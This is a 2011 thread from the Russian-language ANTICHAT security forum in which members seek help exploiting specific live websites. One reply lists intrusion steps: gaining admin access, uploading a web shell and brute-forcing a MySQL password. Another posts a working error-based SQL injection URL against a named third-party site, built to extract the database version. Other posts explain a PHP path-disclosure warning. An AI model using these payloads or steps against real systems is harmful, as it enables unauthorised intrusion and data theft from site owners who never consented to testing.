HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17131  
Старый 31.05.2011, 17:15
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права

З.Ы. какой вопрос такой ответ
 
Ответить с цитированием

  #17132  
Старый 31.05.2011, 17:29
Unknown
Guest
Сообщений: n/a
Провел на форуме:
42706

Репутация: 6
По умолчанию

Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)

Думал есть какие нить варианты как в таблице бд поменять значение.
 
Ответить с цитированием

  #17133  
Старый 01.06.2011, 00:33
0x002
Guest
Сообщений: n/a
Провел на форуме:
982

Репутация: 0
По умолчанию

Помогите уважаемые гуру.

и так вот сайтик:

http://rswow.ru/page.php?p[]=rules

Вылазит такая штука

Цитата:
Сообщение от None  
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in Y:\home\195.88.62.202\www\page.php on line 14
Подскажите как то заюзать данную штуку.

Заранее спасибо.
 
Ответить с цитированием

  #17134  
Старый 01.06.2011, 00:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
 
Ответить с цитированием

  #17135  
Старый 01.06.2011, 00:38
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от 0x002  
0x002 said:
Помогите уважаемые гуру.
и так вот сайтик:
http://rswow.ru/page.php?p[]=rules
Вылазит такая штука
Подскажите как то заюзать данную штуку.
Заранее спасибо.
Например, так:

http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from +(select+count(0),concat((select+version()),floor( rand(0)*2))+from+(select+1+union+select+2+union+se lect+3)x+group+by+2+limit+1)a)+--+
 
Ответить с цитированием

  #17136  
Старый 01.06.2011, 00:54
0x002
Guest
Сообщений: n/a
Провел на форуме:
982

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
Я понял что тип стринг

Цитата:
Сообщение от None  
mysql_real_escape_string() - используется для защиты от sql атак
 
Ответить с цитированием

  #17137  
Старый 01.06.2011, 00:56
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 0x002  
0x002 said:
Я понял что тип стринг
Цитата:
mysql_real_escape_string() - используется для защиты от sql атак
и что?

ты же не будешь проверить на SQL injection через подставку массива вместо стринга

тебе выше показали запрос
 
Ответить с цитированием

  #17138  
Старый 01.06.2011, 01:06
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Раскрытие пути, не более того
 
Ответить с цитированием

  #17139  
Старый 01.06.2011, 02:19
0x002
Guest
Сообщений: n/a
Провел на форуме:
982

Репутация: 0
По умолчанию

Прошу помощи

вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1

Цитата:
Сообщение от None  
Check field dbinfo in table `realmlist` for realm id=
 
Ответить с цитированием

  #17140  
Старый 01.06.2011, 02:22
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от 0x002  
0x002 said:
Прошу помощи
вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1
Где ты там увидел уязвимость?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ